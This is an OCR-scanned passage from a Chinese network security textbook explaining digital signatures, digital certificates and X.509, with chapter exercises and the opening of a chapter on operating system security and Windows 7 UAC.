据 单元 所 作出 的 密码 交换 ， 这 种 数据 和 交换 允许 数据 单元 的 接收 者 用 以 确认 数据 单元 来 源 
和 数据 单元 的 完整 性 ， 并 保护 数据 ， 防 止 被 人 (例如 接收 者 ) 进 行 伪造 。 

数字 签名 是 公 钥 密码 体制 的 典型 应 用 ， 常 用 的 数字 签名 算法 包括 RSA 签名 、DSS( 数 
字 签 名 系统 ) 签 名 和 Hash 签名 。 

数字 签名 是 保障 信息 安全 的 重要 手段 ， 主 要 的 功能 包括 防止 他 人 伪造 签名 、 保 证 信息 
传输 的 完整 性 、 发 送 者 的 身份 认证 、 防 止 交 易 中 的 抵赖 发 生 。 


2. 数字 签名 实现 方式 


报 文 的 发 送 方 利用 单 向 散 列 函数 从 报 文 文本 中 生成 一 个 128 位 的 散 列 值 (或 信息 摘 
要 )。 发 送 方 用 自己 的 私人 密 钥 对 这 个 散 列 值 进行 加 密 来 形成 发 送 方 的 数字 签名 。 然 后 ， 
该 数字 签名 将 作为 报 文 的 附件 和 报 文 一 起 发 送 给 报 文 的 接收 方 。 报 文 的 接收 方 首先 从 接收 
到 的 原始 报 文中 计算 出 128 位 的 散 列 值 (或 信息 摘要 )， 接 着 再 用 发 送 方 的 公开 密 钥 来 对 报 
文 附加 的 数字 签名 进行 解密 得 到 原 散 列 值 。 如 果 这 两 个 散 列 值 相 同 ， 则 接收 方 就 能 确认 该 
数字 签名 是 发 送 方 的 。 通 过 数字 签名 能 够 实现 对 原始 报 文 的 鉴别 。 

采用 数字 签名 可 以 完成 以 下 两 点 确认 : 一 是 确认 信息 是 由 签名 者 发 送 的 ， 二 是 确认 信 
息 自 签发 到 收 到 为 止 没 有 做 过 任何 修改 。 因 此 数字 签名 可 以 用 来 防止 电子 信息 因 易 被 修改 
而 有 人 作伪 ， 或 者 冒 用 他 人 名 义 发 送信 息 ， 或 发 出 ( 收 到 ) 信 息 后 又 加 以 否定 等 情况 发 生 。 


3. 数字 签名 过 程 


数字 签名 的 全 过 程 应 包括 两 方面 的 处 理 : 签名 和 验证 ， 如 图 3-15 所 示 。 

数字 签名 的 详细 过 程 如 下 : 

(1) 发 送 方 对 要 发 送 的 消息 运用 散 列 函数 形成 信息 摘要 。 

(2) 发 送 方 用 自己 的 私有 密 钥 对 信息 摘要 进行 加 密 ， 形 成 数字 签名 。 

(3) 发 送 方 将 数字 签名 附加 在 消息 后 通过 网 络 传送 给 接收 方 。 

(4) 接收 方 用 发 送 方 的 公开 密 钥 对 接收 到 的 签名 信息 进行 解密 ， 得 到 信息 摘要 。 
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(5) 接收 方 运用 同样 的 散 列 函数 对 接收 到 的 消息 形成 信息 摘要 。 


A 的 私 铀 


单 向 散 列 函数 


接收 方 B 


在 B 处 计算 
的 信息 摘要 


信息 摘要 


图 3-15 数字 签名 过 程 


(6) 接收 方 会 对 两 个 信息 摘要 进行 比较 ， 若 两 者 相同 ， 则 说 明 消 息 未 被 算 改 过 。 

在 上 述 数字 签名 过 程 中 定义 的 是 对 原文 做 信息 摘要 和 签名 并 传输 原文 ， 在 很 多 场合 传 
输 的 原文 是 要 求 保密 的 ， 要 求 对 原文 进行 加 密 的 数字 签名 方 要 涉及 “数字 信封 ”的 概念 。 
数字 信封 的 基本 原理 是 将 原文 用 对 称 密 钥 加 密 传输 ， 而 将 对 称 密 钥 用 收 方 公 钥 加 密 发 送 给 
对 方 。 收 方 收 到 电子 信封 ， 用 自己 的 私 钥 解密 信封 ， 取 出 对 称 密 钥 解 密 的 原文 。 


4. 数字 签名 和 数据 加 密 的 区 别 
数字 签名 和 数字 加 密 的 过 程 虽然 都 使 用 公开 密 钥 体系 ， 但 实现 的 过 程 正好 相反 ， 使 用 
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的 密 钥 对 也 不 同 ， 如 图 3-16 所 示 。 数 字 签 名 使 用 的 是 发 送 方 的 密 钥 对 ， 发 送 方 用 自己 的 
私有 密 钥 进行 加 密 ， 接 收 方 用 发 送 方 的 公开 密 钥 进行 解密 ， 这 是 一 个 一 对 多 的 关系 ， 任 何 
拥有 发 送 方 公开 密 钥 的 人 都 可 以 验证 数字 签名 的 正确 性 。 数 字 加 密 则 使 用 的 是 接收 方 的 密 
钥 对 ， 这 是 多 对 一 的 关系 ， 任 何 知道 接收 方 公开 密 钥 的 人 都 可 以 向 接收 方 发 送 加 密 信息 ， 
只 有 唯一 拥有 接收 方 私 有 密 钥 的 人 才能 对 信息 解密 。 另 外 ， 数 字 签名 只 采用 了 非 对 称 密 钥 
加 密 算法 ， 它 能 保证 发 送信 息 的 完整 性 、 身 份 认证 和 不 可 否认 性 ， 而 数字 加 密 采 用 了 对 称 
密 钥 加 密 算法 和 非 对 称 密 钥 加 密 算法 相 结 合 的 方法 ， 它 能 保证 发 送信 息 的 保密 性 。 


1 


发 送 者 发 送 者 的 私 钥 发 送 者 的 公 钥 接收 者 
接收 者 的 公 钥 接收 者 的 私 钥 


图 3-16 数字 签名 和 数据 加 密 的 区 别 


3.4.4 ”数字 证 书 


随 着 网 络 技术 的 发 展 ， 以 及 电子 商务 、 电 子 政务 、 企 业内 网 信息 管理 的 广泛 应 用 。 网 
络 的 开放 性 、 交 互 性 及 其 分 布 特性 使 得 信息 安全 问题 越 来 越 受到 人 们 的 重视 。 身 份 认证 对 
于 保证 信息 只 被 合法 授权 用 户 获取 和 访问 起 着 重要 作用 。 


1. 数字 证 书 的 概述 


数字 证 书 是 一 种 权威 性 的 电子 文档 ， 由 权威 公正 的 第 三 方 机 构 CA 中 心 签发 ， 以 数字 
证 书 为 核心 的 加 密 技术 可 以 对 网 络 上 传输 的 信息 进行 加 密 和 解密 、 数 字 签名 和 身份 验证 ， 
确保 网 上 传递 数据 的 机 密 性 和 完整 性 。 

数字 证 书 广泛 应 用 于 涉及 需要 身份 认证 及 数据 安全 的 各 个 行业 ， 包 括 传统 的 商业 、 制 
造 业 、 流 通 业 的 网 上 交易 ， 以 及 公共 事业 、 金 融 服 务 业 、 公 共 税 务 、 海 关 、 政 府 办 公 、 教 
育 科研 单位 、 保 险 、 医 疗 等 网 上 作业 系统 。 在 网 络 通信 中 ， 通 信 各 方 使 用 数字 证 书 来 证 明 
自己 的 身份 和 识别 对 方 的 身份 。 最 广泛 接受 的 证 书 格式 是 x.509 标准 ， 使 用 最 多 的 就 是 
Xx.509v3 标准 。 


2. 数字 证 书 的 工作 原理 


数字 证 书 基于 公 钥 技术 ， 即 利用 一 对 互相 匹配 的 密 钥 进行 加 密 、 解 密 。 每 个 用 户 自己 
设 定 一 把 特定 的 仅 为 本 人 所 知 的 私有 密 钥 ， 用 它 进 行 解密 和 签名 。 在 公 钥 体制 中 ， 为 每 个 
用 户 生成 一 对 相关 的 密 钥 : 一 个 公开 密 钥 和 一 个 私有 密 钥 。 公 开 密 钥 用 于 对 机 密 信息 的 加 
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密 ， 通 过 非 保密 方式 向 他 人 公开 ; 私有 密 钥 用 于 对 加 密 信息 进行 解密 ， 由 用 户 自己 安全 存 
放 。 贸 易 双 方 进行 信息 交换 的 过 程 是 : 发 送 方 通过 网 络 或 其 他 公开 途径 得 到 接收 方 的 公 
钥 ， 然 后 使 用 该 密 钥 对 信息 加 密 后 发 送 给 接收 方 ; 接收 方 用 自己 的 私 钥 对 收 到 的 信息 进行 
解密 ， 得 到 信息 明文 。 在 这 个 过 程 中 ， 只 有 接收 方才 能 成 功 地 解密 信息 ， 因 为 只 有 接收 方 
拥有 与 之 相对 应 的 私有 密 钥 ， 从 而 保证 了 信息 的 机 密 性 。 如 果 发 送 方 在 发 送信 息 时 附 上 自 
己 的 数字 签名 ， 则 接收 方 通过 验证 数字 签名 可 以 保证 信息 的 完整 性 和 不 可 抵赖 性 。 


3. 数字 证 书 的 类 型 


随 着 网 络 技术 的 发 展 ， 数 字 证 书 的 应 用 范围 涉及 需要 身份 认证 及 数据 安全 的 各 个 行 
业 ， 数 字 证 书 的 类 型 大 致 可 分 为 以 下 三 种 。 

1) “服务 器 证 书 (SSL 证 书 ) 

在 服务 器 设备 上 可 以 安装 服务 器 证 书 来 证 明 服务 器 的 身份 和 进行 通信 加 密 。 服 务 器 证 
书 可 以 用 来 防止 欺诈 钓鱼 站 点 。 

服务 器 证 书 安装 到 服务 器 上 以 后 ， 客 户 端 浏览 器 可 以 与 服务 器 证 书 建立 SSL 连接 ， 
在 SSL 连接 上 传输 的 任何 数据 都 会 被 加 密 。 同 时 ， 浏 览 器 会 自动 验证 服务 器 证 书 是 否 有 
效 ， 验 证 所 访问 的 站 点 是 否 是 假冒 站 点 ， 服 务 器 证 书 保护 的 站 点 多 被 用 来 进行 密码 登录 、 
订单 处 理 、 网 上 银行 交易 等 。SSL 证 书 主要 用 在 服务 器 (应 用 ) 的 数据 传输 链 路 加 密 和 身份 
认证 。 

2) ”电子 邮件 证 书 

电子 邮件 证 书 可 以 用 来 证 明 电 子 邮 件 发 件 人 的 真实 性 。 收 到 具有 有 效 电 子 签名 的 电子 
邮件 ， 我 们 除了 能 相信 邮件 确实 由 指定 邮箱 发 出 外 ， 还 可 以 确信 该 邮件 从 被 发 出 后 没有 被 
自 改 过 。 

另外 ， 使 用 接收 的 邮件 证 书 ， 我 们 还 可 以 向 接收 方 发 送 加 密 邮 件 。 该 加 密 邮件 可 以 在 
非 安全 网 络 传输 ， 只 有 接收 方 的 持 有 者 才能 打开 该 邮件 。 

3) ”客户 端 证 书 

客户 端 证 书 主要 被 用 来 进行 身份 验证 和 电子 签名 。 安 全 的 客户 端 证 书 经 常 存储 在 专用 
的 usbkey 中 。 使 用 key 时 需要 输入 key 的 保护 密码 ， 存 储 于 key 中 的 证 书 不 能 被 导出 或 
复制 ， 这 也 被 称 为 双 因 子 认 证 。 这 种 认证 手段 是 目前 在 因特网 中 最 安全 的 身份 认证 手段 之 
一 。key 的 种 类 有 多 种 : 指纹 识别 、 第 三 键 确认 、 语 音 报 读 以 及 带 显示 屏 的 专用 usbkey 和 
普通 usbkey 等 。 


4. 数字 证 书 的 功能 


以 数字 证 书 为 核心 的 加 密 技术 具有 以 下 四 大 功能 。 

1) “信息 的 保密 性 

网 络 业务 处 理 中 的 各 类 信息 均 有 不 同 程度 的 保密 要 求 。 如 政务 系统 中 用 户 名 和 密码 被 
人 获悉 ， 身 份 就 可 能 被 冒 用 ， 在 线 交 易 的 订货 和 付款 的 信息 被 竞争 对 手 获悉 ， 就 可 能 丧失 
商机 。 而 CA 中 心 颁 发 的 数字 证 书 保证 了 电子 政务 、 电 子 商务 传播 信息 的 保密 性 。 

2) ”网 络 通信 双方 身份 的 确定 性 

网 络 通信 的 双方 很 可 能 素 昧 平生 ， 相 隔 千里 。 要 使 交易 成 功 首先 要 能 确认 对 方 的 身 
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份 ， 对 于 为 顾客 或 用 户 开展 服务 的 政府 行政 服务 中 心 、 银 行 、 和 销售 商店 ， 为 了 做 到 安 
全 、 保 密 、 可 靠 地 开展 服务 活动 ， 都 要 进行 身份 认证 的 工作 。 而 CA 中 心 颁发 的 数字 证 书 
可 保证 网 上 通讯 双方 的 身份 ， 行 政 服务 中 心 、 银 行 和 电子 商务 公司 可 以 通过 CA 认证 确认 
身份 ， 放 心 的 开展 网 上 业务 。 

3) 不 可 否认 性 

CA 中 心 颁发 的 所 有 数字 证 书 类 型 都 确保 了 电子 交易 通信 过 程 的 各 个 环节 的 不 可 否认 
性 ， 使 交易 双方 的 利益 不 受到 损害 。 

4) ”数据 完整 性 

电子 交易 中 数字 证 书 可 以 保证 交易 信息 内 容 不 被 算 改 ， 入 侵 者 不 能 用 假 消息 代 蔡 合法 
消息 ， 确 保 交 易 各 方 信息 的 完整 性 。 


5. 数字 证 书 的 格式 


最 简单 的 证 书包 含 一 个 公开 密 钥 、 名 称 以 及 证 书 授权 中 心 的 数字 签名 。 一 般 情况 下 证 
书 中 还 包括 密 钥 的 有 效 时 间 ， 发 证 机 关 的 名 称 ， 该 证 书 的 序列 号 等 信息 。 

X.509 是 一 种 非常 通用 的 证 书 格式 。 所 有 证 书 的 格式 都 遵循 ITUTX.509 国际 标准 。 这 
个 标准 是 为 了 保证 使 用 数字 证 书 的 系统 间 的 互 操作 性 而 制定 的 。 一 份 X.509 证 书 是 一 些 标 
准 字段 的 集合 ， 这 些 字段 包含 有 关 用 户 或 设备 及 其 相应 公 钥 信息 。 目 前 X.509 有 不 同 的 版 
本 ， 例 如 X.509V2 和 X.509V3 都 是 目前 比较 新 的 版 本 ， 但 都 在 原 有 版 本 基础 上 进行 功能 
的 扩充 。X.509 版 本 3 的 证 书 形式 见 表 3-9。CA 认证 中 心 颁发 的 数字 证 书 均 遵循 X.509V3 
标准 。 证 书 的 管理 一 般 应 通过 目录 服务 来 实现 。 


表 3-9 X.509V3 的 证 书 形式 


版 本 V3 

序列 号 1234567890 

签名 算法 标识 (算法 、 参 数 ) RSA 和 MD5 

签发 者 c=CN，o=JIT-CA 

有 效 期 (起 始 日 期 、 结 束 日 期 ) 01/08/00-01/08/07 

主体 c=CN, o=SX Corp, cn=John Doe 
主体 公 钥 信息 (算法 、 参 数 、 公 开 密 钥 ) | 56af8dc3a4a785d6ff4/RSA/SHA 
发 证 者 唯一 标识 符 Value 

主体 唯一 标识 符 Value 

类 型 | 关键 程度 Value 

类 型 | 关键 程度 Value 

CA 的 数字 签名 


X.509 证 书 内 容 包括 : 版 本 、 序 列 号 、 签 名 算法 标识 、 签 发 者 、 有 效 期 、 主 体 、 主 体 
公开 密 钥 信 息 、CA 的 数字 签名 、 可 选项 等 。 
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3.5 本 章 小 结 


密码 技术 是 网 络 安全 技术 的 核心 。 密 码 的 标准 、 算 法 、 协 议 、 密 钥 管 理 等 是 密码 技术 
研究 的 主要 内 容 。 完 成 加 密 和 解密 的 算法 称 为 密码 体制 (Cipher System)。 密 码 体制 从 原理 
上 可 分 为 三 大 类 : 对 称 密码 体制 、 非 对 称 密码 体制 和 混合 加 密 体制 。 

网 络 数据 加 密 常 见 的 方式 有 链 路 加 密 、 节 点 加 密 和 端 到 端 加 密 三 种 。 链 路 加 密 是 对 网 
络 中 两 个 相 邻 节点 之 间 传 输 的 数据 进行 加 密 保护 ， 节 点 加 密 是 指 在 信息 传输 路 过 的 节点 处 
进行 解密 和 加 密 ; 端 到 端 加 密 是 指 对 一 对 用 户 之 间 的 数据 连续 地 提供 保护 。 

对 称 密码 算法 又 称 为 传统 密码 算法 ， 是 应 用 较 早 的 加 密 算法 ， 技 术 比 较 成 熟 。 在 对 称 
加 密 算法 中 ， 数 据 发 送 方 将 明文 (原始 数据 ) 和 加 密 密 钥 一 起 经 过 特殊 加 密 算法 处 理 后 ， 使 
其 变 成 复杂 的 加 密 密 文 发 送出 去 。 接 收 方 收 到 密 文 后 ， 若 想 解读 原文 ， 需 要 先 用 加 密 时 使 
用 的 密 钥 及 相同 算法 的 逆 算 法 对 密 文 进行 解密 ， 才 能 使 其 恢复 成 可 读 明 文 。 目 前 使 用 较 多 
的 对 称 密码 算法 有 DES 算法 、3DES 算法 、IDEA 算法 和 AES 算法 。 

非 对 称 密码 算法 也 被 称 为 公 钥 密码 算法 ， 是 建立 在 数学 函数 基础 上 的 。 它 在 加 密 解 密 
时 ， 分 别 使 用 了 两 个 不 同 的 密 钥 : 一 个 可 对 外 界 公开 的 公 钥 和 一 个 只 有 所 有 者 知道 的 私 
钥 。 非 对 称 加 密 算法 的 基本 原理 是 : 如 果 发 信 方 想 发 送 只 有 收 信 方 才能 解读 的 加 密 信息 ， 
发 信 方 必须 首先 知道 收 信 方 的 公 钥 ， 然 后 利用 收 信 方 的 公 钥 来 加 密 原 文 ; 收 信 方 收 到 加 密 
密 文 后 ， 使 用 自己 的 私 钥 才 能 解密 密 文 。 非 对 称 密码 算法 主要 有 RSA 算法 、Elgamal 算 
法 、 椭 圆 曲 线 加 密 算法 (ECC) 等 。 

PKI 是 一 个 采用 公 钥 密码 算法 原理 和 技术 来 提供 安全 服务 的 通用 性 基础 平台 ， 用 户 可 
以 利用 PKI 平台 提供 的 安全 服务 进行 安全 通信 ，PKI 采用 标准 的 密 钥 管 理 规则 ， 能 够 为 所 
有 应 用 透明 地 提供 采用 加 密 和 数字 签名 等 密码 服务 所 需要 的 密 钥 和 证 书 管理 。PKI 在 组 成 
上 主要 包含 认证 机 构 (CA)、 注 册 机 构 (RA)、 证 书 管理 系统 、PKI 策略 管理 和 PKI 应 用 接口 
等 几 部 分 。 

在 认证 技术 领域 ， 数 字 签 名 是 公 钥 密码 体制 的 典型 应 用 ， 常 用 的 数字 签名 算法 包括 
RSA 签名 、DSS( 数 字 签 名 系统 ) 签 名 和 Hash 签名 。 数 字 签名 是 保障 信息 安全 的 重要 手 
段 ， 主 要 的 功能 包括 防止 他 人 伪造 签名 、 保 证 信息 传输 的 完整 性 、 发 送 者 的 身份 认证 、 防 
止 交易 中 的 抵赖 发 生 。 数 字 证 书 是 一 种 权威 性 的 电子 文档 ， 由 权威 公正 的 第 三 方 机 构 CA 
中 心 签 发 ， 以 数字 证 书 为 核心 的 加 密 技术 可 以 对 网 络 上 传输 的 信息 进行 加 密 和 解密 、 数 字 
签名 和 身份 验证 ， 确 保 网 上 传递 数据 的 机 密 性 和 完整 性 。 


3.6 课 后 练习 


1. 填空 题 

(1) 密码 体制 从 原理 上 可 分 为 三 大 类 : 和 

(2) 网 络 加 密 的 三 种 方式 s 和 ; 
(3) DES 算法 主要 采用 和 来 实现 加 密 解密 。 
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(4) 常用 的 对 称 加 密 技 术 主 要 有 4 种 方法 : 、 变 位 加 
密 和 _ _  . 

(5) 数字 证 书 的 类 型 有 S 、 

(6) PKI 在 组 成 上 主要 包含 y 、PKI 
策略 管理 和 等 几 部 分 。 


2. 选择 题 


(1) DES 加 密 算法 采用 ( ”) 位 密 钥 。 
A. 64 B. 108 C. 56 D. 168 
(2) IDEA 加 密 算法 采用 ( “) 位 密 钥 。 
A.64 B. 128 G56 D. 108 
(3) 下 列 对 于 数字 签名 要 求 的 说 法 中 ， 不 正确 的 是 ( 。 )。 
A. 收 方 能 够 确认 或 证 实 发 方 的 签名 ， 但 不 能 伪造 。 
B. 发 方 发 出 签名 的 消息 送 收 方 后 ， 就 不 能 再 否认 他 所 签发 的 消息 。 
C. 收 方 对 己 收 到 的 签名 消息 不 能 否认 ， 即 有 收 到 认证 。 
D. 第 三 者 不 可 确认 收发 双方 之 间 的 消息 传送 。 
(4) 在 电子 商务 安全 技术 中 ， 数 字 签名 技术 有 着 特别 重要 的 地 位 ， 以 下 ( 。”) 服 务 不 
要 用 到 数字 签名 技术 。 


A. 源 鉴别 B. 完整 性 服务 
C. 不 可 否认 服务 D. 以 上 都 要 用 到 
3. 判断 题 
(1) 对 称 密码 体制 不 能 实现 数字 签名 ， 而 非 对 称 密码 体制 可 以 实现 数字 签名 。 
上 
(2) DES 算法 是 一 种 最 通用 的 非 对 称 密 钥 算法 ， 属 于 分 组 密码 算法 。 CY 
(3) IDEA 加 密 算法 ， 在 密码 学 中 属于 分 组 密码 算法 。 让 
(4) 数字 签名 使 用 的 是 发 送 方 的 密 钥 对 ， 发 送 方 用 自己 的 私有 密 钥 进行 加 密 ， 接 收 方 
用 发 送 方 的 公开 密 钥 进行 解密 。 C3 
(5) 用 散 列 函数 进行 的 RSA 签名 比 没 有 用 散 列 函 数 进行 的 RSA 签名 速度 要 快 许多 。 
入 
(6) 认证 机 构 CA 和 注册 机 构 RA 都 可 以 发 放 数 字 证 书 。 和 


4. 简 答题 


(1) 简 述 网 络 加 密 的 三 种 方式 以 及 各 自 优 缺点 。 

(2) 简 述 非 对 称 加 密 算法 的 基本 原理 。 

(3) DES 算法 加 密 由 哪 四 部 分 组 成 ? 简要 描述 DES 算法 的 操作 过 程 。 
(4) 简 述 散 列 算法 的 基本 原理 。 

(5) 简要 叙述 CA 的 功能 。 

(6) 试 述 PKI 的 基本 功能 。 

(7) 什么 是 数字 签名 ? 
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(8) 简 述 数字 签名 和 数据 加 密 的 区 别 。 


(9) 什么 是 数字 证 书 ? 简要 叙述 数字 证 书 的 工作 原理 。 


(10) 数字 证 书 中 包含 哪些 内 容 ? 


103 


操作 系统 是 计算 机 资源 的 直接 管理 者 ， 它 和 硬件 打交道 并 为 用 
户 提供 接口 ， 是 计算 机 软件 的 基础 和 核心 。 操 作 系统 的 安全 是 计算 
机 系统 安全 的 基础 。 在 网 络 环境 下 ， 网 络 操作 系统 的 安全 性 对 网 络 
安全 意义 重大 。 本 章 主 要 讲述 网 络 操作 系统 的 安全 和 维护 、 主 流 操 
作 系 统 的 安全 性 和 安全 配置 ， 以 及 系统 的 备份 和 恢复 。 


106 网 络 安全 与 管理 


4.1 操作 系统 安全 基础 


操作 系统 (Operating System，OS) 是 控制 其 他 程序 运行 ， 管 理 系统 资源 并 为 用 户 提供 操 
作 界 面 的 系统 软件 集合 ， 是 管理 电脑 硬件 与 软件 资源 的 程序 。 网 络 操作 系统 (NOS) 是 具备 
网 络 功能 的 操作 系统 ， 它 在 计算 机 操作 系统 下 工作 ， 使 计算 机 操作 系统 增加 了 网 络 操作 所 
需要 的 能 力 ， 是 连接 计算 机 硬件 与 网 络 通信 软件 及 用 户 的 桥梁 。 

操作 系统 安全 是 指 操作 系统 对 计算 机 系统 的 硬件 和 软件 进行 有 效 的 控制 ， 能 够 为 所 管 
理 的 资源 提供 相应 的 安全 保护 。 


4.1.1 安全 操作 系统 的 概念 


安全 操作 系统 通常 是 指 实现 了 特定 安全 策略 的 操作 系统 ， 它 从 监控 信息 访问 的 角度 出 
发 对 系统 中 的 信息 载体 、 产 生 信息 流动 的 操作 和 发 起 操作 的 用 户 进行 提取 、 抽 象形 成 客 
体 、 权 限 和 主体 的 概念 。 通 过 实施 特定 的 安全 策略 来 控制 主体 对 客体 所 进行 访问 权限 的 许 
可 ， 保 证 系统 中 信息 流动 和 变化 过 程 中 的 正确 性 ， 从 而 提高 系统 的 安全 性 。 

安全 操作 系统 要 在 访问 控制 、 标 记 、 身 份 鉴别 、 客 体重 用 、 审 计 、 数 据 完 整 性 、 隐 项 
信道 分 析 、 可 信 路 径 和 可 信 恢 复 等 方面 满足 相应 的 安全 技术 要 求 。 通 常 ， 安 全 操作 系统 的 
设计 有 两 种 方式 ， 一 种 是 自 开始 设计 就 充分 考虑 系统 的 安全 性 ， 另 一 种 是 基于 一 个 通用 的 
操作 系统 ， 专 门 进行 安全 性 改进 或 增强 ， 并 通过 相应 的 安全 性 评测 。 


4.1.2 网 络 操作 系统 的 安全 性 要 求 


网 络 操作 系统 的 安全 是 网 络 系统 安全 的 基础 ， 没 有 操作 系统 的 安全 就 没有 网 络 的 安 
全 ， 网 络 操作 系统 安全 的 目标 是 对 系统 中 的 用 户 、 对 象 等 进行 控制 ， 防 止 恶 意 用 户 对 计算 
机 系统 资源 进行 窃取 、 破 坏 等 非法 操作 。 为 实现 这 一 目标 ， 网 络 操作 系统 在 安全 上 要 符合 
以 下 要 求 。 

(1) 用 户 账号 安全 。 用 户 登 录 系 统 需要 输入 账号 和 密码 ， 或 者 通过 数字 证 书 。 密 码 如 
果 采 用 明文 传输 很 容易 被 别人 窃取 ， 因 此 在 密码 存储 和 传输 过 程 中 要 进行 加 密 处 理 ， 另 
外 ， 还 可 以 采用 生物 特征 识别 的 方式 进行 账户 认证 。 

(2) 访问 控制 。 访 问 控 制 是 指 实施 细 粒 度 的 用 户 访问 控制 、 细 化 访问 权限 等 。 它 的 主 
要 功能 是 : 防止 非法 主体 访问 受 保护 资源 ， 人 允许 合法 用 户 访问 受 保护 网 络 资源 ， 防 止 合法 
用 户 对 受 保护 的 网 络 资源 进行 非 授 权 访 问 。 访 问 控 制 包 括 自主 访问 控制 和 强制 访问 控制 。 

(3) 数据 的 机 密 性 、 完 整 性 。 数 据 的 机 密 性 是 指 用 来 保护 存储 的 关键 信息 、 数 据 和 文 
件 免 受 非 授权 的 利用 和 泄露 。 数 据 的 完整 性 指 为 了 防止 数据 被 恶意 代码 破坏 ， 对 关键 信息 
进行 数字 签名 等 技术 保护 。 

(4) 系统 可 用 性 。 系 统 可 用 性 直接 关系 到 用 户 的 使 用 感受 ， 因 此 系统 应 具备 应 对 攻击 
和 灾难 恢复 的 能 力 。 

(5) 安全 审计 。 安 全 审计 可 以 有 效 地 保护 系统 资源 ， 帮 助 管理 员 鉴别 对 系统 的 监听 、 
窃听 行为 ， 同 时 在 系统 检测 和 故障 恢复 方面 也 发 挥 着 重要 作用 。 
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4.1.3 ”操作 系统 的 安全 机 制 和 安全 模型 
1. 操作 系统 的 安全 机 制 
为 满足 操作 系统 的 安全 性 要 求 ， 所 采用 的 安全 机 制 主要 有 隔离 控制 、 访 问 控制 和 信息 


流 控制 等 。 


(1) 隔离 控制 机 制 。 隔 离 控制 是 确保 系统 安全 与 可 靠 的 一 种 重要 手段 ， 常 用 于 防止 不 
同系 统 组 件 之 间 相互 干扰 而 导致 的 威胁 。 目 前 用 于 隔离 控制 的 方法 有 4 种 : 物理 隔离 、 时 
间隔 离 、 逻 辑 隔 离 和 密码 隔离 。 

(2) 访问 控制 机 制 。 访 问 控制 要 解决 的 核心 问题 是 抑制 对 系统 中 资源 对 象 的 非法 存 取 
和 访问 ， 保 证 主体 仅 能 以 明确 授权 的 方式 对 客体 进行 访问 。 操 作 系 统 的 访问 控制 应 遵循 一 
定 的 原则 ， 如 表 4-1 所 示 。 


原 则 
最 小 权限 原则 
最 大 共享 原则 


访问 的 开放 与 封闭 


自主 访问 控制 
强制 访问 控制 
离散 访问 控制 


基于 角色 的 访问 控制 


域 和 类 型 执行 的 访问 
权限 

用 户 标识 与 鉴别 
审计 


表 4-1 访问 控制 遵循 的 原则 


措施 
每 个 主体 在 任何 时 刻 仅 拥 有 最 小 访问 权 的 集合 
在 一 定 的 约束 之 内 使 存储 的 信息 获得 做 大 的 应 用 
在 封闭 系统 中 ， 仅 当 有 明确 授权 时 才 访问 ;在 开放 系统 中 ， 除 非 明确 禁 
止 ， 访 问 都 是 允许 的 
允许 主体 对 访问 控制 施加 特定 限制 
由 系统 对 主体 创建 的 对 象 进行 统一 的 强制 性 控制 ， 主 体 无 权 干 涉 
根据 请 求 的 主 、 客 体 名 称 做 出 可 否 访问 的 选择 
将 访问 许可 分 配给 一 定 的 角色 ， 用 户 通过 饰演 不 同 的 角色 获得 角色 拥有 的 
访问 权限 


通过 对 系统 中 不 同 的 任务 ， 限 定 不 同 的 执行 域 和 类 型 的 访问 许可 控制 


标识 用 户 身份 ， 鉴 别 其 合法 性 
记录 、 检 查 以 及 分 析 研 究 程序 或 用 户 安全 行为 的 一 系列 操作 


(3) 信息 流 控制 机 制 。 信 息 流 控制 就 是 规定 客体 能 够 存储 信息 的 安全 类 和 客体 安全 类 
之 间 的 关系 ， 其 中 包括 不 同安 全 类 客体 之 间 信 息 的 流动 关系 。 信 息 流 的 安全 信道 包括 可 信 


信道 和 隐秘 信道 。 


2. 操作 系统 的 安全 模型 


安全 模型 是 指 用 形式 化 的 方法 来 描述 如 何 实现 系统 的 机 密 性 、 完 整 性 和 可 用 性 。 形 式 
化 的 安全 模型 是 设计 开发 高 级 别 安全 操作 系统 的 前 提 。 安 全 模型 是 对 安全 策略 所 表达 的 安 
全 需求 进行 简单 、 抽 象 和 无 歧义 的 描述 ， 它 为 安全 策略 与 实现 机 制 之 间 的 关联 提供 了 一 种 
框架 。 比 较 知 名 的 安全 模型 有 : BLP 模型 、Biba 模型 、Clark-Wilson 模型 、Chinese Wall 


模型 和 RBAC 模型 等 。 
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4.2 Windows 7 操作 系统 的 安全 


Windows 系列 是 微软 推出 的 视窗 操作 系统 ，Windows 7 是 该 系列 的 第 7 个 版 本 ， 也 是 
目前 被 广泛 应 用 的 版 本 。Windows 7 共 发 布 了 6 个 版 本 ， 它 们 分 别 是 Windows 7 Starter( 初 
级 版 )、Windows 7 Home Basic( 家 庭 普 通 版 )、Windows 7 Home Premium( 家 庭 高 级 版 )、 
Windows 7 Professional( 专 业 版 )、Windows 7 Enterprise( 企 业 版 ) 和 Windows 7 Ultimate( 旗 
舰 版 )。 

Windows 7 做 了 许多 方便 用 户 的 设计 ， 简 化 了 日 常任 务 ， 通 过 家 庭 网 络 可 以 轻松 的 共 
享 文件 和 打印 机 ， 通 过 跳 转 列表 (Jump List) 可 以 快速 访问 您 最 喜爱 的 图 片 、 歌 曲 和 文档 
等 ， 利 用 Windows Live Essentials 可 以 一 次 下 载 一 整套 精彩 程序 。 另 外 ，Windows 7 在 系 
统 性 能 方面 做 了 大 量 的 工作 ， 使 得 系统 更 加 的 灵活 、 高 效 ， 且 响应 快 ，Windows 7 大 幅 缩 
减 了 系统 启动 时 间 和 睡眠 恢复 时 间 ， 并 且 能 够 快速 连接 到 无 线 网 络 ， 快 速 搜索 ， 快 速 响应 
USB 设备 等 。Windows 7 在 系统 空闲 时 使 用 的 更 少 的 内 存 ， 且 仅 当 需要 时 才 运行 后 台 服 务 
(如 Blue Tooth)。 


4.2.1 Windows 7 操作 系统 的 安全 性 


与 以 往 版 本 相 比 ，Windows 7 在 安全 性 方面 也 有 全 面 的 改进 和 提升 ， 主 要 表现 在 以 下 
几 个 方面 。 


1. UAC( 用 户 账户 控制 ) 


用 户 账户 控制 是 微软 在 Vista 版 本 中 引入 的 概念 ， 目 的 是 帮助 用 户 更 好 的 保护 系统 安 
全 ， 防 止 恶意 软件 的 入 侵 。 它 将 所 有 账户 (包括 管理 员 账 户 ) 以 标准 账户 权限 运行 ， 如 果 用 
户 进行 的 某 些 操作 需要 管理 员 特 权 ， 则 需要 先 请 求 获得 许可 。UAC 将 系统 中 的 可 疑 进程 
全 部 排除 在 内 核 之 外 ， 每 次 运行 都 要 弹出 窗口 询问 ， 这 大 大 降低 了 系统 的 方便 程度 。 
